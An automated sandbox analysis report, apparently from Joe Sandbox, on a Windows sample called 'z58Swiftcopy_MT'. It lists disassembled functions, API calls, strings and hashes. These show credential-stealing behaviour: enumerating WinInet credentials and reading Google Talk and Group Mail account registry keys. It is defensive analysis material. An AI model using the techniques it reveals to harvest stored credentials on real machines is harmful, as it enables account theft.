                                                                                                                                                                                                                                      control_flow_graph 331 4086e0-408704 call 4045db 334 4088f7-408906 call 404656 331->334 335 40870a-408716 331->335 337 408718-40872b CredEnumerateW 335->337 338 40872d-408731 335->338 337->338 338->334 341 408737-408764 wcslen 338->341 343 40876a 341->343 344 4088ef-4088f3 LocalFree 341->344 345 40876f-408774 343->345 344->334 345->344 346 40877a-40879e wcsncmp 345->346 347 4087a4-4087bb 346->347 348 4088dd-4088e9 346->348 347->347 349 4087bd-4087ee call 40466b call 404734 347->349 348->344 348->345 354 4088d1-4088d8 call 404785 349->354 355 4087f4-40880c call 4047a5 349->355 354->348 355->354 359 408812-408838 memset 355->359 360 40883a 359->360 361 40883c-4088a9 memcpy wcschr 359->361 360->361 362 4088b7-4088cb LocalFree 361->362 363 4088ab-4088b3 361->363 362->354 363->362
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                                                                      • LocalFree.KERNELBASE(?), ref: 004088F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$FreeLocal$LibraryLoadmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                                      • API String ID: 3950215071-260894208
                                                                                                                                                                                                                                      • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                                                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                                                                      Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 365 4037ca-40381c memset * 2 call 444551 368 4038e2-4038e5 365->368 369 403822-403882 call 4021b6 call 406f06 * 2 strchr 365->369 376 403884-403895 _mbscpy 369->376 377 403897-4038a2 strlen 369->377 378 4038bf-4038dd _mbscpy call 4023e5 376->378 377->378 379 4038a4-4038bc sprintf 377->379 378->368 379->378
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                                      • String ID: %s@yahoo.com
                                                                                                                                                                                                                                      • API String ID: 317221925-3288273942
                                                                                                                                                                                                                                      • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                                                                                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                                                                                                                                      Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 381 4034e4-403544 memset * 2 call 410b1e 384 403580-403582 381->384 385 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 381->385 385->384
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403504
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                                      • API String ID: 3071782539-966475738
                                                                                                                                                                                                                                      • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                                                                                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                                                                                                      Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 390 40ccd7-40cd06 ??2@YAPAXI@Z 391 40cd08-40cd0d 390->391 392 40cd0f 390->392 393 40cd11-40cd24 ??2@YAPAXI@Z 391->393 392->393 394 40cd26-40cd2d call 404025 393->394 395 40cd2f 393->395 396 40cd31-40cd57 394->396 395->396 399 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 396->399 400 40cd59-40cd60 DeleteObject 396->400 400->399
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040CD96
                                                                                                                                                                                                                                      • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2054149589-0
                                                                                                                                                                                                                                      • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                                                                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                                                                      Function 0044B40E Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 407 44b40e-44b415 GetModuleHandleA 408 44b455 407->408 409 44b417-44b426 call 44b42b 407->409 411 44b457-44b45b 408->411 418 44b48d 409->418 419 44b428-44b433 GetProcAddress 409->419 413 44b45d-44b465 GetModuleHandleA 411->413 414 44b49a call 44b49f 411->414 417 44b467-44b46f 413->417 417->417 420 44b471-44b474 417->420 422 44b48e-44b496 418->422 419->408 423 44b435-44b442 VirtualProtect 419->423 420->411 421 44b476-44b478 420->421 424 44b47e-44b486 421->424 425 44b47a-44b47c 421->425 431 44b498 422->431 427 44b454 423->427 428 44b444-44b452 VirtualProtect 423->428 429 44b487-44b488 GetProcAddress 424->429 425->429 427->408 428->427 429->418 431->420
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                        • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                      • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                                                                                      Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408620
                                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408671
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                                      • API String ID: 1366857005-1079885057
                                                                                                                                                                                                                                      • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                                                                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                                                                      Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 455 40ba28-40ba3a 456 40ba87-40ba9b call 406c62 455->456 457 40ba3c-40ba52 call 407e20 _mbsicmp 455->457 479 40ba9d call 4107f1 456->479 480 40ba9d call 404734 456->480 481 40ba9d call 404785 456->481 482 40ba9d call 403c16 456->482 483 40ba9d call 410a9c 456->483 462 40ba54-40ba6d call 407e20 457->462 463 40ba7b-40ba85 457->463 468 40ba74 462->468 469 40ba6f-40ba72 462->469 463->456 463->457 464 40baa0-40bab3 call 407e30 472 40bab5-40bac1 464->472 473 40bafa-40bb09 SetCursor 464->473 471 40ba75-40ba76 call 40b5e5 468->471 469->471 471->463 475 40bac3-40bace 472->475 476 40bad8-40baf7 qsort 472->476 475->476 476->473 479->464 480->464 481->464 482->464 483->464
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                                      • API String ID: 882979914-1578091866
                                                                                                                                                                                                                                      • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                                                                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                                                                      Function 0044B3CF Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                      • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                                                                      Function 0044B42B Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2152742572-0
                                                                                                                                                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                      • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                                                                      Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,762D0A60,?,00000000), ref: 00410D1C
                                                                                                                                                                                                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                      • API String ID: 889583718-2036018995
                                                                                                                                                                                                                                      • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                                                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                                                                      Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
